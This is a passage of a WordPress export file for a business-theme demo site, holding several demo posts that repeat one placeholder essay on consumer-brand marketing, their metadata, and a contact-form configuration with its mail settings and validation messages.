		<wp:post_id>430</wp:post_id>
		<wp:post_date><![CDATA[2020-02-24 09:00:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-02-24 09:00:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[the-future-of-retail-asias-ecosystems]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="analysis"><![CDATA[analysis]]></category>
		<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="post_tag" nicename="business"><![CDATA[business]]></category>
		<category domain="category" nicename="marketing"><![CDATA[marketing]]></category>
		<category domain="post_format" nicename="post-format-video"><![CDATA[Video]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_video]]></wp:meta_key>
		<wp:meta_value><![CDATA[https://vimeo.com/87959439]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[in-media-trimming-costs-boosts-value-transform]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[438]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_pingme]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_encloseme]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[bg_video]]></wp:meta_key>
		<wp:meta_value><![CDATA[432]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Digital Transformation Roadmap: Enablers</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/digital-transformation-roadmap-enablers/</link>
		<pubDate>Wed, 14 Aug 2019 09:02:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=434</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>434</wp:post_id>
		<wp:post_date><![CDATA[2019-08-14 09:02:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2019-08-14 09:02:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[digital-transformation-roadmap-enablers]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="finance"><![CDATA[finance]]></category>
		<category domain="category" nicename="marketing"><![CDATA[marketing]]></category>
		<category domain="post_format" nicename="post-format-quote"><![CDATA[Quote]]></category>
		<category domain="post_tag" nicename="tips"><![CDATA[tips]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_quote]]></wp:meta_key>
		<wp:meta_value><![CDATA[I cannot give you the formula for success, but I can give you the 
formula for failure. It is: Try to please everybody.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[quote_name]]></wp:meta_key>
		<wp:meta_value><![CDATA[David Oswald]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[439]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[entering-the-next-phase-of-digital-transformation]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>How to Write a Successful Grant Application</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/how-to-write-a-successful-grant-application/</link>
		<pubDate>Thu, 08 Nov 2018 09:04:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=436</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>436</wp:post_id>
		<wp:post_date><![CDATA[2018-11-08 09:04:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2018-11-08 09:04:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[how-to-write-a-successful-grant-application]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="category" nicename="finance"><![CDATA[finance]]></category>
		<category domain="post_format" nicename="post-format-gallery"><![CDATA[Gallery]]></category>
		<category domain="post_tag" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2018-11-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_gallery]]></wp:meta_key>
		<wp:meta_value><![CDATA[438]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_gallery]]></wp:meta_key>
		<wp:meta_value><![CDATA[439]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_gallery]]></wp:meta_key>
		<wp:meta_value><![CDATA[440]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Crowdfunding. How to Get Funding Online?</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/crowdfunding-how-to-get-funding-online/</link>
		<pubDate>Sun, 04 Mar 2018 09:07:57 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=444</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>444</wp:post_id>
		<wp:post_date><![CDATA[2018-03-04 09:07:57]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2018-03-04 09:07:57]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[crowdfunding-how-to-get-funding-online]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="category" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="post_tag" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="post_tag" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Contactless Payments’ Time Has Come</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/contactless-payments-time-has-come/</link>
		<pubDate>Fri, 04 Sep 2020 09:09:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=447</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>447</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:09:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:09:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[contactless-payments-time-has-come]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="post_tag" nicename="business"><![CDATA[business]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[448]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Coming Soon Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/?post_type=wpcf7_contact_form&#038;p=610</link>
		<pubDate>Wed, 09 Sep 2020 03:52:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=610</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="cs-form flex-middle">
[email* your-email placeholder "Your Email *"]<button class="octf-btn">Sign Up</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz 
support@oceanthemes.net
From: [your-name] 
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz 
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>610</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:52:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:52:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[coming-soon-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="cs-form flex-middle">
[email* your-email placeholder "Your Email *"]<button class="octf-btn">Sign Up</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Elements</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/elements__trashed/</link>
		<pubDate>Wed, 09 Sep 2020 06:56:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=624</guid>
		<description></description>
		<content:encoded><![CDATA[<h4>Icon Boxes</h4>		
